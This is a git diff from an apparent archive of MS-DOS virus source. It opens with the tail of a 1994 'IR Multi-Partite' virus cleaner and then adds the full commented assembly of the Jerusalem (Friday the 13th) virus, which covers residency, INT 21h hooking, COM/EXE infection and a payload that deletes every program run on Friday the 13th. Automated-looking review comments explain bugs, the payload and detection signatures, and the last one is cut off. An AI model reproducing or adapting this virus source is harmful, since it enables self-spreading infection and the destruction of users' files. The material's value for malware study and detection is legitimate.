cx,1B9h ; 441 bytes + mov dx,offset data_15 + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + cmp data_15,3E8h + jne loc_5 ; Jump if not equal + mov ah,9 + mov dx,offset data_9 ; ('is infected by IR MultiP') + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp ah,15h + je loc_7 ; Jump if equal + mov ah,9 + mov dx,offset data_11 ; (' - No') + int 21h ; DOS Services 
ah=function 09h + ; display char string at ds:dx + jmp short loc_6 + db 90h +loc_5: + mov ah,9 + mov dx,offset data_8 ; ('is clean...') + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx +loc_6: + mov ah,3Eh + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + mov data_15,0 + pop si + pop si + pop dx + pop cx + pop bx + pop ax + retn +loc_7: + mov ah,9 + mov dx,offset data_10 ; (' - Yes') + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get file date+time, bx=handle + ; returns cx=time, dx=time + push cx + push dx + xor cx,cx ; Zero register + xor dx,dx ; Zero register + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov ah,40h ; '@' + mov cx,3 + mov dx,offset data_17 + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + xor cx,cx ; Zero register + mov dx,ax + sub dx,1B9h + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov ah,40h ; '@' + mov cx,0 + mov dx,offset data_15 + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + pop dx + pop cx + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time + jmp short loc_6 +sub_1 endp + +data_1 db 'IR Multi-Partite Virus Killer by' + db ' -+ RatMan +-', 0Ah, 0Dh +copyright db '(C) 1994 RatMan - This program i' + db 's free of charge for all use' + db 'rs.', 0Ah, 0Dh, 'DISCLAIMER: Thi' + db 's software is provided "AS IS" ' + db 'without warranty of any kind,', 0Ah + db 0Dh, 'either expressed or implied' + db ', including but not limmited 
to ' + db 'the fitness for', 0Ah, 0Dh, 'any' + db ' particular purpose. The entire ' + db 'risk as to its quality or perfor' + db 'mance', 0Ah, 0Dh, 'is assumed by' + db ' the user.', 0Ah, 0Dh, 0Ah, 0Dh, '$' +data_2 db 'Warning!: IR MultiPartite Virus ' + db 'found in MBR of Drive C: - Clean' + db ' (Y/N)', 0Ah, 0Dh, ' (I' + db 'f the System was booted from Dri' + db 've C: you should reboot', 0Ah, 0Dh + db ' from a clean floppy b' + db 'efore trying to clean your syste' + db 'm.....)', 7, 0Ah, 0Dh, 0Ah, 0Dh, '$' +data_4 db 'Drive C: MBR is now Clean......', 0Ah + db 0Dh, 0Ah, 0Dh, '$' +data_5 db 'Scanning the files in the Curren' + db 't Directory.....', 0Ah, 0Dh, 0Ah + db 0Dh, '$' +data_6 db 'Scanner fails Self-Check.....', 7 + db 0Ah, 0Dh, '$' +data_8 db 'is clean...', 0Dh, 0Ah, '$' +data_9 db 'is infected by IR MultiPartite V' + db 'irus - Clean ? (Y/N)', 7, '$' +data_10 db ' - Yes', 0Ah, 0Dh, '$' +data_11 db ' - No', 0Ah, 0Dh, '$' + db 0, 0 +data_12 db 2Ah + db 2Eh, 43h, 4Fh, 4Dh, 00h +data_13 db 1 + db 63 dup (1) +data_15 dw 0 + db 0 +data_17 db 0 + db 1021 dup (0) + +seg_a ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.israeli.asm b/MSDOS/Virus.MSDOS.Unknown.israeli.asm new file mode 100644 index 00000000..46f77f58 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.israeli.asm 
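Review bot: The `mov ax,3D02h` / `int 21h` open in `sub_1` is not followed by a carry check, so when the open fails the error code left in `ax` is moved into `bx` and used as a file handle for the seek, the 441-byte read, the `cmp data_15,3E8h` test and the close; a two-line fix is `jc loc_8` after that `int 21h` and a `loc_8:` label on the first `pop si`. The same missing check applies to the `int 13h` read at `loc_1` and to the sector-2-to-sector-1 copy after it: a failed read leaves whatever `data_15` already holds, and that buffer is then written over the MBR without checking the 55AAh boot signature of the recovered sector. Note also that the file test is a single word (`3E8h`, i.e. `E8 03`, a near `call` with displacement 3) at EOF-441, and that answering Y truncates the file there (`mov ah,40h` with `mov cx,0`), so an uninfected program that happens to contain that opcode at that position loses its last 441 bytes.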
@@ -0,0 +1,753 @@ +;The "Jerusalem" virus. +;Also Called - Israeli, PLO, Friday the 13th - Version A + + + PAGE 64,132 +;-----------------------------------------------------------------------; +; THE "JERUSALEM" VIRUS ; +;-----------------------------------------------------------------------; + ; + ORG 100H ; + ; +;-----------------------------------------------------------------------; +; JERUSALEM VIRUS ; +;-----------------------------------------------------------------------; +BEGIN_COM: ;COM FILES START HERE + JMP CONTINUE ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +A0103 DB 073H,055H + +MS_DOS DB 'MsDos' ; + + DB 000H,001H,015H,018H + +TIME_BOMB DB 0 ;WHEN == 1 THIS FILE GETS DELETED! + + DB 000H +A0010 DB 000H + +A0011 DW 100H ;HOST SIZE (BEFORE INFECTION) + +OLD_08 DW 0FEA5H,0F000H ;OLD INT 08H VECTOR (CLOCK TIC) + +OLD_21 DW 1460H,024EH ;OLD INT 21H VECTOR +OLD_24 DW 0556H,16A5H ;001B + +A_FLAG DW 7E48H ;??? + +A0021 DB 000H,000H,000H,000H,000H,000H,000H + DB 000H,000H,000H,000H + +A002C DW 0 ;A SEGMENT + + DB 000H,000H +A0030 DB 000H + +A0031 DW 0178EH ;OLD ES VALUE + +A0033 DW 0080H ; + ; +EXEC_BLOCK DW 0 ;ENV. SEG. ADDRESS ;0035 + DW 80H ;COMMAND LINE ADDRESS + DW 178EH ;+4 + DW 005CH ;FCB #1 ADDRESS + DW 178EH ;+8 + DW 006CH ;FCB #2 ADDRESS + DW 0178EH ;+12 + ; +HOST_SP DW 0710H ;(TAKEN FROM EXE HEADER) 0043 +HOST_SS DW 347AH ;(AT TIME OF INFECTION) +HOST_IP DW 00C5H ; +HOST_CS DW 347AH ; +;CHECKSUM NOT STORED, TO UNINFECT, YOU MUST CALC IT YOURSELF + ; +A004B DW 0F010H ; +A004D DB 82H ; +A004E DB 0 ; + +EXE_HDR DB 1CH DUP (?) ;004F + +A006B DB 5 DUP (?) 
;LAST 5 BYTES OF HOST + +HANDLE DW 0005H ;0070 +HOST_ATT DW 0020H ;0072 +HOST_DATE DW 0021H ;0074 +HOST_TIME DW 002DH ;0076 + +BLOCK_SIZE DW 512 ;512 BYTES/BLOCK + +A007A DW 0010H + +HOST_SIZE DW 27C0H,0001H ;007C +HOST_NAME DW 41D9H,9B28H ;POINTER TO HOST NAME + +COMMAND_COM DB 'COMMAND.COM' + + DB 1 +A0090 DB 0,0,0,0,0 + +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +CONTINUE: ; + CLD ; + MOV AH,0E0H ;DO A ???... + INT 21H ; + ; + CMP AH,0E0H ; + JNC L01B5 ; + CMP AH,3 ; + JC L01B5 ; + ; + MOV AH,0DDH ; + MOV DI,offset BEGIN_COM ;DI = BEGINNING OF OUR (VIRUS) CODE + MOV SI,0710H ;SI = SIZE OF OUR (VIRUS) CODE + ADD SI,DI ;SI = BEGINNING OF HOST CODE + MOV CX,CS:[DI+11H] ;CX = (SIZE OF HOST CODE?) + INT 21H ; + ; +L01B5: MOV AX,CS ;TWEEK CODE SEGMENT BY 100H + ADD AX,10H ; + MOV SS,AX ;SS = TWEEKed CS + MOV SP,700H ;SP = END OF OUR CODE (VIRUS) + ; +;TWEEK CS TO MAKE IT LOOK LIKE IP STARTS AT 0, NOT 100H BY DOING A RETF + ; + PUSH AX ;JMP FAR CS+10H:IP-100H + MOV AX,offset BEGIN_EXE - offset BEGIN_COM + PUSH AX ; + RETF ; + ; +;---------------------------------------; + ORG 0C5h ; +;---------------------------------------; + ; +BEGIN_EXE: ;EXE FILES START HERE + CLD ; + PUSH ES ; + ; + MOV CS:[A0031],ES ; + MOV CS:[EXEC_BLOCK+4],ES ;INIT EXEC_BLOCK SEG VALUES + MOV CS:[EXEC_BLOCK+8],ES ; + MOV CS:[EXEC_BLOCK+12],ES ; + ; + MOV AX,ES ;TWEEK ES SAME AS CS ABOVE + ADD AX,10H ; + ADD CS:[HOST_CS],AX ; SAVE NEW ES VALUE + ADD CS:[HOST_SS],AX ; + ; + MOV AH,0E0H ; + INT 21H ; + ; + CMP AH,0E0H ; + JNC L0106 ;00F1 7313 + ; + CMP AH,3 ; + POP ES ;00F6 + MOV SS,CS:[HOST_SS] ; + MOV SP,CS:[HOST_SP] ; + JMP far CS:[HSOT_IP] ; + ; +L0106: XOR AX,AX ;0106 33C0 + MOV ES,AX ;0108 8EC0 + MOV AX,ES:[03FC] ;010A 26A1FC03 + MOV CS:[A004B],AX ;010E 2EA34B00 + MOV AL,ES:[03FE] ;0112 26A0FE03 + MOV CS:[A004D],AL ;0116 2EA24D00 + MOV Word ptr ES:[03FC],A5F3 ;011A 26C706FC03F3A5 + 
MOV Byte ptr ES:[03FE],CB ;0121 26C606FE03CB + POP AX ;0127 58 + ADD AX,10H ;0128 051000 + MOV ES,AX ;012B 8EC0 + PUSH CS ;012D 0E + POP DS ;012E 1F + MOV CX,710H ;SIZE OF VIRUS CODE + SHR CX,1 ;0132 D1E9 + XOR SI,SI ;0134 33F6 + MOV DI,SI ;0136 8BFE + PUSH ES ;0138 06 + MOV AX,0142 ;0139 B84201 + PUSH AX ;013C 50 + JMP 0000:03FC ;013D EAFC030000 + ; + MOV AX,CS ;0142 8CC8 + MOV SS,AX ;0144 8ED0 + MOV SP,700H ;0146 BC0007 + XOR AX,AX ;0149 33C0 + MOV DS,AX ;014B 8ED8 + MOV AX,CS:[A004B] ;014D 2EA14B00 + MOV [03FC],AX ;0151 A3FC03 + MOV AL,CS:[A004D] ;0154 2EA04D00 + MOV [03FE],AL ;0158 A2FE03 + MOV BX,SP ;015B 8BDC + MOV CL,04 ;015D B104 + SHR BX,CL ;015F D3EB + ADD BX,+10 ;0161 83C310 + MOV CS:[A0033],BX ; + ; + MOV AH,4AH ; + MOV ES,CS:[A0031] ; + INT 21H ;MODIFY ALLOCATED MEMORY BLOCKS + ; + MOV AX,3521 ; + INT 21H ;GET VECTOR + MOV CS:[OLD_21],BX ; + MOV CS:[OLD_21+2],ES ; + ; + PUSH CS ;0181 0E + POP DS ;0182 1F + MOV DX,offset NEW_INT_21 ;0183 BA5B02 + MOV AX,2521 ; + INT 21H ;SAVE VECTOR + ; + MOV ES,[A0031] ;018B 8E063100 + MOV ES,ES:[A002C] ;018F 268E062C00 + XOR DI,DI ;0194 33FF + MOV CX,7FFFH ;0196 B9FF7F + XOR AL,AL ;0199 32C0 + REPNE SCASB ;019C AE + CMP ES:[DI],AL ;019D 263805 + LOOPNZ 019B ;01A0 E0F9 + MOV DX,DI ;01A2 8BD7 + ADD DX,+03 ;01A4 83C203 + MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM + PUSH ES ; + POP DS ; + PUSH CS ; + POP ES ; + MOV BX,35H ; + ; + PUSH DS ;01B1 ; + PUSH ES ; + PUSH AX ; + PUSH BX ; + PUSH CX ; + PUSH DX ; + ; + MOV AH,2AH ; + INT 21H ;GET DATE + ; + MOV Byte ptr CS:[TIME_BOMB],0 ;SET "DONT DIE" + ; + CMP CX,1987 ;IF 1987... + JE L01F7 ;...JUMP + CMP AL,5 ;IF NOT FRIDAY... + JNE L01D8 ;...JUMP + CMP DL,0DH ;IF DATE IS NOT THE 13th... 
+ JNE L01D8 ;...JUMP + INC Byte ptr CS:[TIME_BOMB] ;TIC THE BOMB COUNT + JMP L01F7 ; + ; +L01D8: MOV AX,3508H ;GET CLOCK TIMER VECTOR + INT 21H ;GET VECTOR + MOV CS:[OLD_08],BX ; + MOV CS:[OLD_08],ES ; + ; + PUSH CS ;DS=CS + POP DS ; + ; + MOV Word ptr [A_FLAG],7E90H ; + ; + MOV AX,2508H ;SET NEW CLOCK TIC HANDLER + MOV DX,offset NEW_08 ; + INT 21H ;SET VECTOR + ; +L01F7: POP DX ; + POP CX ; + POP BX ; + POP AX ; + POP ES ; + POP DS ; + PUSHF ; + CALL far CS:[OLD_21] ; + PUSH DS ; + POP ES ; + ; + MOV AH,49H ; + INT 21H ;FREE ALLOCATED MEMORY + ; + MOV AH,4DH ; + INT 21H ;GET RETURN CODE OF A SUBPROCESS + ; +;---------------------------------------; +; THIS IS WHERE WE REMAIN RESIDENT ; +;---------------------------------------; + MOV AH,31H ; + MOV DX,0600H ;020F ; + MOV CL,04 ; + SHR DX,CL ; + ADD DX,10H ; + INT 21H ;TERMINATE AND REMAIN RESIDENT + ; +;---------------------------------------; +NEW_24: XOR AL,AL ;021B ;CRITICAL ERROR HANDLER + IRET ; + ; +;-----------------------------------------------------------------------; +; NEW INTERRUPT 08 (CLOCK TIC) HANDLER ; +;-----------------------------------------------------------------------; +NEW_08: CMP Word ptr CS:[A_FLAG],2 ;021E + JNE N08_10 ;IF ... 
JUMP + ; + PUSH AX ; + PUSH BX ; + PUSH CX ; + PUSH DX ; + PUSH BP ; + MOV AX,0602H ;SCROLL UP TWO LINES + MOV BH,87H ;INVERSE VIDEO ATTRIBUTE + MOV CX,0505H ;UPPER LEFT CORNER + MOV DX,1010H ;LOWER RIGHT CORNER + INT 10H ; + POP BP ; + POP DX ; + POP CX ; + POP BX ; + POP AX ; + ; +N08_10: DEC Word ptr CS:[A_FLAG] ; + JMP N08_90 ; + MOV Word ptr CS:[A_FLAG],1 ; + ; + PUSH AX ; + PUSH CX ; + PUSH SI ; THIS DELAY CODE NEVER GETS EXECUTED + MOV CX,4001H ; IN THIS VERSION + REP LODSB ; + POP SI ; + POP CX ; + POP AX ; + ; +N08_90: JMP far CS:[OLD_08] ;PASS CONTROL TO OLD INT 08 VECTOR + ; +;-----------------------------------------------------------------------; +; NEW INTERRUPT 21 HANDLER ; +;-----------------------------------------------------------------------; +NEW_21: PUSHF ;025B ; + CMP AH,0E0H ;IF A E0 REQUEST... + JNE N21_10 ; + MOV AX,300H ;...RETURN AX = 300H + POPF ; (OUR PUSHF) + IRET ; + ; +N21_10: CMP AH,0DDH ;0266 ; + JE N21_30 ;IF DDH...JUMP TO _30 + CMP AH,0DEH ; + JE N21_40 ;IF DEH...JUMP TO _40 + CMP AX,4B00H ;IF SPAWN A PROG... + JNE N21_20 ; + JMP N21_50 ;...JUMP TO _50 + ; +N21_20: POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ;ANY OTHER INT 21 GOES TO OLD VECTOR + ; +N21_30: POP AX ;REMOVE OUR (PUSHF) + POP AX ;? 
+ MOV AX,100H ; + MOV CS:[000A],AX ; + POP AX ; + MOV CS:[000C],AX ; + REP MOVSB ; + POPF ; (OUR PUSHF) + MOV AX,CS:[000F] ; + JMP far CS:[000A] ; + ; +N21_40: ADD SP,+06 ;0298 ; + POPF ; (OUR PUSHF) + MOV AX,CS ; + MOV SS,AX ; + MOV SP,710H ;SIZE OF VIRUS CODE + PUSH ES ; + PUSH ES ;02A4 06 + XOR DI,DI ;02A5 33FF + PUSH CS ;02A7 0E + POP ES ;02A8 07 + MOV CX,0010 ;02A9 B91000 + MOV SI,BX ;02AC 8BF3 + MOV DI,0021 ;02AE BF2100 + REP MOVSB ;02B2 A4 + MOV AX,DS ;02B3 8CD8 + MOV ES,AX ;02B5 8EC0 + MUL Word ptr CS:[A007A] ;02B7 2EF7267A00 + ADD AX,CS:[002B] ;02BC 2E03062B00 + ADC DX,+00 ;02C1 83D200 + DIV Word ptr CS:[A007A] ;02C4 2EF7367A00 + MOV DS,AX ;02C9 8ED8 + MOV SI,DX ;02CB 8BF2 + MOV DI,DX ;02CD 8BFA + MOV BP,ES ;02CF 8CC5 + MOV BX,CS:[002F] ;02D1 2E8B1E2F00 + OR BX,BX ;02D6 0BDB + JE 02ED ;02D8 7413 + MOV CX,8000 ;02DA B90080 + REP MOVSW ;02DE A5 + ADD AX,1000 ;02DF 050010 + ADD BP,1000 ;02E2 81C50010 + MOV DS,AX ;02E6 8ED8 + MOV ES,BP ;02E8 8EC5 + DEC BX ;02EA 4B + JNE 02DA ;02EB 75ED + MOV CX,CS:[002D] ;02ED 2E8B0E2D00 + REP MOVSB ;02F3 A4 + POP AX ;02F4 58 + PUSH AX ;02F5 50 + ADD AX,0010 ;02F6 051000 + ADD CS:[0029],AX ;02F9 2E01062900 + ADD CS:[0025],AX ;02FE 2E01062500 + MOV AX,CS:[0021] ;0303 2EA12100 + POP DS ;0307 1F + POP ES ;0308 07 + MOV SS,CS:[0029] ;0309 2E8E162900 + MOV SP,CS:[0027] ;030E 2E8B262700 + JMP far CS:[0023] ;0313 2EFF2E2300 + ; +;---------------------------------------; +; IT IS TIME FOR THIS FILE TO DIE... ; +; THIS IS WHERE IT GETS DELETED ! ; +;---------------------------------------; +N21_5A: XOR CX,CX ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE (ATT=0) + ; + MOV AH,41H ; + INT 21H ;DELETE A FILE + ; + MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM + POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ; + ; +;---------------------------------------; +; START INFECTION ; +;---------------------------------------; +N21_50: CMP Byte ptr CS:[TIME_BOMB],1 ;032C ;IF TIME TO DIE... 
+ JE N21_5A ;...JUMP + ; + MOV Word ptr CS:[HANDLE],-1 ;ASSUME NOT OPEN + MOV Word ptr CS:[A008F],0 ; + MOV word ptr CS:[HOST_NAME],DX ;SAVE POINTER TO FILE NAME + MOV word ptr CS:[HOST_NAME+2],DS ; + ; +;INFECTION PROCESS OCCURS HERE ; + PUSH AX ;034C 50 + PUSH BX ;034D 53 + PUSH CX ;034E 51 + PUSH DX ;034F 52 + PUSH SI ;0350 56 + PUSH DI ;0351 57 + PUSH DS ;0352 1E + PUSH ES ;0353 06 + CLD ;0354 FC + MOV DI,DX ;0355 8BFA + XOR DL,DL ;0357 32D2 + CMP Byte ptr [DI+01],3A ;0359 807D013A + JNE L0364 ;035D 7505 + MOV DL,[DI] ;035F 8A15 + AND DL,1F ;0361 80E21F + ; +L0364: MOV AH,36 ; + INT 21H ;GET DISK FREE SPACE + CMP AX,-1 ;0368 3DFFFF + JNE L0370 ;036B 7503 +L036D: JMP I_90 ;036D E97702 + ; +L0370: MUL BX ;0370 F7E3 + MUL CX ;0372 F7E1 + OR DX,DX ;0374 0BD2 + JNE L037D ;0376 7505 + CMP AX,710H ;0378 3D1007 + JC L036D ;037B 72F0 +L037D: MOV DX,word ptr CS:[HOST_NAME] + PUSH DS ;0382 1E + POP ES ;0383 07 + XOR AL,AL ;0384 32C0 + MOV CX,41 ;0386 B94100 + REPNE SCASB ;038A AE + MOV SI,word ptr CS:[HOST_NAME] +L0390: MOV AL,[SI] ;0390 8A04 + OR AL,AL ;0392 0AC0 + JE L03A4 ;0394 740E + CMP AL,61 ;0396 3C61 + JC L03A1 ;0398 7207 + CMP AL,7A ;039A 3C7A + JA L03A1 ;039C 7703 + SUB Byte ptr [SI],20 ;039E 802C20 +L03A1: INC SI ;03A1 46 + JMP L0390 ;03A2 EBEC + ; +L03A4: MOV CX,000B ;03A4 B90B00 + SUB SI,CX ;03A7 2BF1 + MOV DI,offset COMMAND_COM ;03A9 BF8400 + PUSH CS ;03AC 0E + POP ES ;03AD 07 + MOV CX,000B ;03AE B90B00 + REPE CMPSB ;03B2 A6 + JNE L03B8 ;03B3 7503 + JMP I_90 ;03B5 E92F02 + ; +L03B8: MOV AX,4300H ; + INT 21H ;CHANGE FILE MODE + JC L03C4 ;03BD 7205 + ; + MOV CS:[HOST_ATT],CX ;03BF ; +L03C4: JC L03EB ;03C4 7225 + XOR AL,AL ;03C6 32C0 + MOV CS:[A004E],AL ;03C8 2EA24E00 + PUSH DS ;03CC 1E + POP ES ;03CD 07 + MOV DI,DX ;03CE 8BFA + MOV CX,41 ;03D0 B94100 + REPNZ SCASB ;03D4 AE + CMP Byte ptr [DI-02],4D ;03D5 807DFE4D + JE L03E6 ;03D9 740B + CMP Byte ptr [DI-02],6D ;03DB 807DFE6D + JE L03E6 ;03DF 7405 + INC Byte ptr CS:[A004E] ;03E1 2EFE064E00 + ; +L03E6: MOV 
AX,3D00H ; + INT 21H ;OPEN FILE READ ONLY +L03EB: JC L0447 ; + MOV CS:[HANDLE],AX ;03ED ; + ; + MOV BX,AX ;MOVE TO END OF FILE -5 + MOV AX,4202 ; + MOV CX,-1 ;FFFFFFFB + MOV DX,-5 ; + INT 21H ;MOVE FILE POINTER + JC L03EB ; + ; + ADD AX,5 ;0400 ; + MOV CS:[A0011],AX ;?SAVE HOST SIZE + ; + MOV CX,5 ;0407 ;READ LAST 5 BYTES OF HOST + MOV DX,offset A006B ; + MOV AX,CS ; + MOV DS,AX ; + MOV ES,AX ; + MOV AH,3FH ; + INT 21H ;READ FROM A FILE + ; + MOV DI,DX ;0417 ;CHECK IF LAST 5 BYTES = 'MsDos' + MOV SI,offset MS_DOS ; + REPE CMPSB ; + JNE L0427 ; + MOV AH,3E ;IF == 'MsDos'... + INT 21H ;CLOSE FILE + JMP I_90 ;...PASS CONTROL TO DOS + ; +L0427: MOV AX,3524 ;GET CRITICAL ERROR VECTOR + INT 21H ;GET VECTOR + MOV [OLD_24],BX ; + MOV [OLD_24+2],ES ; + ; + MOV DX,offset NEW_24 ; + MOV AX,2524 ;SET CRITICAL ERROR VECTOR + INT 21H ;SET VECTOR + ; + LDS DX,dword ptr [HOST_NAME]; + XOR CX,CX ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE +L0447: JC L0484 ; + ; + MOV BX,CS:[HANDLE] ; + MOV AH,3E ; + INT 21H ;CLOSE FILE + ; + MOV Word ptr CS:[HANDLE],-1 ;CLEAR HANDLE + ; + MOV AX,3D02 ; + INT 21H ;OPEN FILE R/W + JC L0484 ; + ; + MOV CS:[HANDLE],AX ;0460 2EA37000 + MOV AX,CS ;0464 8CC8 + MOV DS,AX ;0466 8ED8 + MOV ES,AX ;0468 8EC0 + MOV BX,[HANDLE] ;046A 8B1E7000 + MOV AX,5700 ;046E B80057 + INT 21H ;GET/SET FILE DATE TIME + ; + MOV [HOST_DATE],DX ;0473 89167400 + MOV [HOST_TIME],CX ;0477 890E7600 + MOV AX,4200 ;047B B80042 + XOR CX,CX ;047E 33C9 + MOV DX,CX ;0480 8BD1 + INT 21H ;MOVE FILE POINTER +L0484: JC L04C3 ;0484 723D + ; + CMP Byte ptr [A004E],00 ;0486 803E4E0000 + JE L0490 ;048B 7403 + JMP L04E6 ;048D EB57 + ; + NOP ;048F 90 +L0490: MOV BX,1000 ;0490 BB0010 + MOV AH,48 ;0493 B448 + INT 21H ;ALLOCATE MEMORY + JNC L04A4 ;0497 730B + ; + MOV AH,3E ;0499 B43E + MOV BX,[HANDLE] ;049B 8B1E7000 + INT 21H ;CLOSE FILE (OBVIOUSLY) + JMP I_90 ;04A1 E94301 + ; +L04A4: INC Word ptr [A008F] ;04A4 FF068F00 + MOV ES,AX ;04A8 8EC0 + XOR SI,SI ;04AA 33F6 + MOV DI,SI ;04AC 8BFE + MOV 
CX,710H ;04AE B91007 + REP MOVSB ;04B2 A4 + MOV DX,DI ;04B3 8BD7 + MOV CX,[A0011] ;?GET HOST SIZE - YES + MOV BX,[70H] ;04B9 8B1E7000 + PUSH ES ;04BD 06 + POP DS ;04BE 1F + MOV AH,3FH ;04BF B43F + INT 21H ;READ FROM A FILE +L04C3: JC L04E1 ;04C3 721C + ; + ADD DI,CX ;04C5 03F9 + ; + XOR CX,CX ;POINT TO BEGINNING OF FILE + MOV DX,CX ; + MOV AX,4200H ; + INT 21H ;MOVE FILE POINTER + ; + MOV SI,offset MS_DOS ;04D0 BE0500 + MOV CX,5 ;04D3 B90500 + REP CS:MOVSB ;04D7 2EA4 + MOV CX,DI ;04D9 8BCF + XOR DX,DX ;04DB 33D2 + MOV AH,40H ; + INT 21H ;WRITE TO A FILE +L04E1: JC L04F0 ; + JMP L05A2 ; + ; +;---------------------------------------; +; READ EXE HEADER ; +;---------------------------------------; +L04E6: MOV CX,1CH ;READ EXE HEADER INTO BUFFER + MOV DX,offset EXE_HDR ; + MOV AH,3F ; + INT 21H ;READ FILE + JC L053C ; + ; +;---------------------------------------; +; TWEEK EXE HEADER TO INFECTED HSOT ; +;---------------------------------------; + MOV Word ptr [EXE_HDR+18],1984H ;SAVE HOST'S EXE HEADER INFO + MOV AX,[EXE_HDR+14] ; SS + MOV [HOST_SS],AX ; + MOV AX,[EXE_HDR+16] ; SP + MOV [HOST_SP],AX ; + MOV AX,[EXE_HDR+20] ; IP + MOV [HOST_IP],AX ; + MOV AX,[EXE_HDR+22] ; CS + MOV [HOST_CS],AX ; + MOV AX,[EXE_HDR+4] ; SIZE (IN 512 BLOCKS) + CMP Word ptr [EXE_HDR+2],0 ; SIZE MOD 512 + JZ L051B ;IF FILE SIZE==0...JMP + DEC AX ; +L051B: MUL Word ptr [BLOCK_SIZE] ; + ADD AX,[EXE_HDR+2] ; + ADC DX,0 ;AX NOW = FILE SIZE + ; + ADD AX,0FH ;MAKE SURE FILE SIZE IS PARA. 
BOUND + ADC DX,0 ; + AND AX,0FFF0H ; + MOV [HOST_SIZE],AX ;SAVE POINTER TO BEGINNING OF VIRUS + MOV [HOST_SIZE+2],DX ; + ; + ADD AX,710H ;(SIZE OF VIRUS) + ADC DX,0 ; +L053C: JC L0578 ;IF > FFFFFFFF...JMP + DIV Word ptr [BLOCK_SIZE] ; + OR DX,DX ; + JE L0547 ; + INC AX ; +L0547: MOV [EXE_HDR+4],AX ; + MOV [EXE_HDR+2],DX ; + ;---------------; + MOV AX,[HOST_SIZE] ;DX:AX = HOST SIZE + MOV DX,[HOST_SIZE+2] ; + DIV Word ptr [A007A] ; + SUB AX,[EXE_HEAD+8] ;SIZE OF EXE HDR + MOV [EXE_HDR+22],AX ;VALUE OF CS + MOV Word ptr [EXE_HDR+20],offset BEGIN_EXE ;VALUE OF IP + MOV [EXE_HDR+14],AX ;VALUE OF SS + MOV Word ptr [EXE_HDR+16],710H ;VALUE OF SP + ;---------------; + XOR CX,CX ;POINT TO BEGINNING OF FILE (EXE HDR) + MOV DX,CX ; + MOV AX,4200H ; + INT 21H ;MOVE FILE POINTER +L0578: JC L0584 ; + ; +;---------------------------------------; +; WRITE INFECTED EXE HEADER ; +;---------------------------------------; + MOV CX,1CH ; + MOV DX,offset EXE_HDR ; + MOV AH,40H ; + INT 21H ;WRITE TO A FILE +L0584: JC L0597 ; + CMP AX,CX ; + JNE L05A2 ; + ; + MOV DX,[HOST_SIZE] ;POINT TO END OF FILE + MOV CX,[HOST_SIZE+2] ; + MOV AX,4200 ; + INT 21H ;MOVE FILE POINTER +L0597: JC L05A2 ; + ; +;---------------------------------------; +; WRITE VIRUS CODE TO END OF HOST ; +;---------------------------------------; + XOR DX,DX ; + MOV CX,710H ;(SIZE OF VIRUS) + MOV AH,40H ; + INT 21H ;WRITE TO A FILE + ; +L05A2: CMP Word ptr CS:[008F],0 ;IF... + JZ L05AE ;...SKIP + MOV AH,49H ; + INT 21H ;FREE ALLOCATED MEMORY + ; +L05AE: CMP Word ptr CS:[HANDLE],-1 ;IF ... 
+ JE I_90 ;...SKIP + ; + MOV BX,CS:[HANDLE] ;RESTORE HOST'S DATE/TIME + MOV DX,CS:[HOST_DATE] ; + MOV CX,CS:[HOST_TIME] ; + MOV AX,5701H ; + INT 21H ;GET/SET FILE DATE/TIME + ; + MOV AH,3EH ; + INT 21H ;CLOSE FILE + ; + LDS DX,CS:[HOST_NAME] ;RESTORE HOST'S ATTRIBUTE + MOV CX,CS:[HOST_ATT] ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE + ; + LDS DX,dword ptr CS:[OLD_24];RESTORE CRITICAL ERROR HANDLER + MOV AX,2524H ; + INT 21H ;SET VECTOR + ; +I_90: POP ES ; + POP DS ; + POP DI ; + POP SI ; + POP DX ; + POP CX ; + POP BX ; + POP AX ; + POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ;PASS CONTROL TO DOS + ; +;-----------------------------------------------------------------------; +; ; +;----------------------------------------------------------------------- + diff --git a/MSDOS/Virus.MSDOS.Unknown.isreali.asm b/MSDOS/Virus.MSDOS.Unknown.isreali.asm new file mode 100644 index 00000000..84c88f9f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.isreali.asm 
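Review bot: The comment on `TIME_BOMB` (`;WHEN == 1 THIS FILE GETS DELETED!`) misdescribes the payload: `N21_50` tests the flag on every `AX=4B00H` request and `N21_5A` sets attribute 0 and deletes the file named in `DS:DX`, so it is any program the user runs that is deleted, not the infected host; suggested wording is `;WHEN == 1, EVERY PROGRAM RUN VIA INT 21H AX=4B00H IS DELETED INSTEAD OF BEING INFECTED (SEE N21_5A)`. The flag is set only in the install path (`MOV AH,2AH` get-date, skip if `CX=1987`, else Friday `AL=5` and day `DL=0DH`), so a comment there should say it is evaluated once at install time and never re-checked by `NEW_08`. For detection the hunk also shows the two recognisers worth listing in the header: the 5-byte `'MsDos'` trailer compared at the end of the host before infecting, and the 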